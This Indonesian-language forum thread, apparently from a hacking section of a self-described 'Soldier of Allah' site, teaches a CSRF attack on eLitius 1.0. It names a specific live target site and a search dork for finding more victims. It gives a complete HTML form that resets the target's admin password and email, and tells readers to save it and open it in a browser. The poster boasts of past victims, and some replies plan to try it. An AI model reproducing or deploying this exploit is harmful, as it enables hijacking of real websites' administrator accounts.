Soldier Of Allah adalah Team Pembela Islam
 
IndeksPortalCalendarFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Sedikit mengenai CSRF attack

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
cyberkalashnikov

avatar

Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

PostSubyek: Sedikit mengenai CSRF attack   Thu Jan 07, 2010 9:37 pm

In the name of Allah

CSRF ==> Cross Site Requery Forgery

mungkin sedikit asing di dengar..
csrf merupakan salah satu exploit dalam web aplikasi yang bisa di gunakan untuk melakukan penetrasi kedalam web yang di jadikan target...
merupakan salah satu exploit favorit ana..
hhe..
karena simple n mudah...


cheers cheers

wew gimana caranya ntu...
ana ambil contoh bugs lama...
tapi gak tau masih bisa jalan atau gak..soalnya exploit ini udah jadul banget..
tapi ana tulis hanya untuk sekedar pengetahuan...
tidak ada kata basi dalam ilmu pengetahuan..

target kita..
http://www.hwb-services.co.uk

exploit = CSRF

dork = Powered by eLitius Version 1.0

ok..
kita ambil sample code html yang bisa di gunakan untuk bypassing admin login melalui csrf attack...

Code:
<title> Powered by eLitius Version 1.0 Change Password

<form action="http://www.hwb-services.co.uk/admin/manage-admin.php" method="post" name="adminForm">
<table class="admintable">
<tbody> <tr>
<td>
<table class="adminform" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<th colspan="2"> Change Password Of admin </th>
</tr>
<tr>


</tr>
<tr>
<td>Username:</td>
<td>
<input name="username" class="inputbox" size="40" value="admin" type="text" readonly="readonly" />
</td>
</tr> <tr>
<td> Password:</td>
<td>
<input class="inputbox" name="password" size="40" value="admin" type="text" />
</td>
</tr>
<tr>
<td> Email:</td>
<td> <input class="inputbox" name="email" size="40" value="cyber.kalashnikov@gmail.com" type="text" /> </td>
</tr>
<tr>
<td colspan="2"> 
</td>
</tr>

</tbody>
</table>
<input name="task" value="" type="hidden" />
<div style="margin-top:10px;"><input class="button" onclick="document.adminForm.task.value='edit'" type="submit" value="Save"> </div>
</td>
<td style="vertical-align: top; margin: 0; padding: 0;">
<table class="adminform" cellpadding="0" cellspacing="0">
<tr>
<th colspan="2">Dork: Powered by eLitius Version 1.0</th>
</tr>

<tr>
<center> <td style="font-weight: bold;"> CYBER.KALASHNIKOV</td> 7lt;/center>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
<input name="cid[]" value="1" type="hidden" />
<td>Download:http://www.elitius.com/</td>
</form>

</body>
</html>

sekarang copy kedalam notepad..
terus simpan dalam ekstensi html
terus eksekusi melalui web browser antum skalian...

semoga bermanfaat..

jazakallah khair
Kembali Ke Atas Go down
Lihat profil user http://www.cyberkalashnikov.co.cc
Tamu
Tamu



PostSubyek: Re: Sedikit mengenai CSRF attack   Fri Jan 08, 2010 9:58 am

Syukron akhi

Jazakallah khairon
Kembali Ke Atas Go down
Neo|g4br1eL



Jumlah posting : 86
Join date : 07.01.10

PostSubyek: Re: Sedikit mengenai CSRF attack   Fri Jan 08, 2010 4:32 pm

Mantaf bro,nice share Very Happy dlu klau g salah friendster jg ada bug bginian
Kembali Ke Atas Go down
Lihat profil user
CS-31

avatar

Jumlah posting : 42
Join date : 05.01.10
Age : 27
Lokasi : Ngalam

PostSubyek: Re: Sedikit mengenai CSRF attack   Fri Jan 08, 2010 11:38 pm

good share ijin mempelajari
Kembali Ke Atas Go down
Lihat profil user http://sector31.co.cc
kurtz

avatar

Jumlah posting : 16
Join date : 11.01.10
Age : 31
Lokasi : Jakarta

PostSubyek: Re: Sedikit mengenai CSRF attack   Mon Jan 11, 2010 5:50 pm

POC secara lengkapy dun sob, mklum newbie baru denger CSRF Laughing
Kembali Ke Atas Go down
Lihat profil user http://djomblo-community.co.cc
SOA.hugo

avatar

Jumlah posting : 36
Join date : 10.01.10
Age : 26
Lokasi : tangerang

PostSubyek: Re: Sedikit mengenai CSRF attack   Mon Jan 11, 2010 8:49 pm

assalamualaikum..

iya akhi POC secara detailnya..
kalau bisa ada video tutornya..hehehe.. Razz Razz
Kembali Ke Atas Go down
Lihat profil user http://shootercrew.blogspot.com
SyNTaX eRRoR

avatar

Jumlah posting : 28
Join date : 12.01.10

PostSubyek: Re: Sedikit mengenai CSRF attack   Fri Jan 15, 2010 11:16 pm

ilmu lagi neh... mantab jaya dah
Kembali Ke Atas Go down
Lihat profil user
AccHill35



Jumlah posting : 15
Join date : 12.01.10
Age : 24
Lokasi : Palembang

PostSubyek: Re: Sedikit mengenai CSRF attack   Sat Jan 16, 2010 12:11 am

Alhamdulillah, ilmu baru,

kalo ga salah,
Ini type attack yg memodifikasi script dari webpage ya akhi ?
Kembali Ke Atas Go down
Lihat profil user Http://www.palembanghackerlink.com
Gariz_Keraz

avatar

Jumlah posting : 120
Join date : 12.01.10
Age : 23
Lokasi : Mojokerto

PostSubyek: Re: Sedikit mengenai CSRF attack   Sat Jan 16, 2010 12:34 am

Syukron Akhi....

dapet ilmu baru....
Kembali Ke Atas Go down
Lihat profil user http://www.afz-devils.co.cc
cyberkalashnikov

avatar

Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

PostSubyek: Re: Sedikit mengenai CSRF attack   Sat Jan 16, 2010 4:55 am

SOA.hugo wrote:
assalamualaikum..

iya akhi POC secara detailnya..
kalau bisa ada video tutornya..hehehe.. Razz Razz

kalau poc dari video..
agak ribet..
soalnya ini exploit langka n jarang dapat..
hhe...

ana ada dapat beberapa kali korban...tapi lupa terus untuk di dokumentasikan dalam bentuk video..
afwan akhi
Kembali Ke Atas Go down
Lihat profil user http://www.cyberkalashnikov.co.cc
cyberkalashnikov

avatar

Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

PostSubyek: Re: Sedikit mengenai CSRF attack   Sat Jan 16, 2010 4:57 am

AccHill35 wrote:
Alhamdulillah, ilmu baru,

kalo ga salah,
Ini type attack yg memodifikasi script dari webpage ya akhi ?

kurang lebih begitu akhi...
trik ini bisa di pake untuk bypassing filterisasi melalui celah client side script...

Makanya dalam buku SIH dari om sto...
jangan pernah percaya dengan apa yang dikirimkan melalui client side...
affraid affraid
Kembali Ke Atas Go down
Lihat profil user http://www.cyberkalashnikov.co.cc
T-roy

avatar

Jumlah posting : 4
Join date : 03.05.10

PostSubyek: Re: Sedikit mengenai CSRF attack   Mon May 03, 2010 6:15 am

asa'mekum anak bru ne.....
lam knl buat kk'?? Cool
Kembali Ke Atas Go down
Lihat profil user
Ghur4b4



Jumlah posting : 15
Join date : 23.06.10

PostSubyek: Re: Sedikit mengenai CSRF attack   Fri Jun 25, 2010 1:51 am

bru coba tpi lo bisa.. mklum nubie..
bwt master2 skalian mohon ptnjuk n tutor lengkapnya dunk..

syukron Very Happy
Kembali Ke Atas Go down
Lihat profil user
El-Farhatz

avatar

Jumlah posting : 60
Join date : 20.03.10
Lokasi : Bumi Allah

PostSubyek: Re: Sedikit mengenai CSRF attack   Sat Jun 26, 2010 3:42 am

wah manteb neh akhi ,,,,seep , coba coba dulu ah Very Happy
Kembali Ke Atas Go down
Lihat profil user
rascal_21

avatar

Jumlah posting : 68
Join date : 29.04.10
Age : 28
Lokasi : Cyber Jihad

PostSubyek: Re: Sedikit mengenai CSRF attack   Wed Jun 30, 2010 3:35 pm

izin plajari dolo..akhi Very Happy

Jazakallah khairon
Kembali Ke Atas Go down
Lihat profil user http://albantani-crew.friendhood.net/
Sponsored content




PostSubyek: Re: Sedikit mengenai CSRF attack   

Kembali Ke Atas Go down
 
Sedikit mengenai CSRF attack
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial-
Navigasi: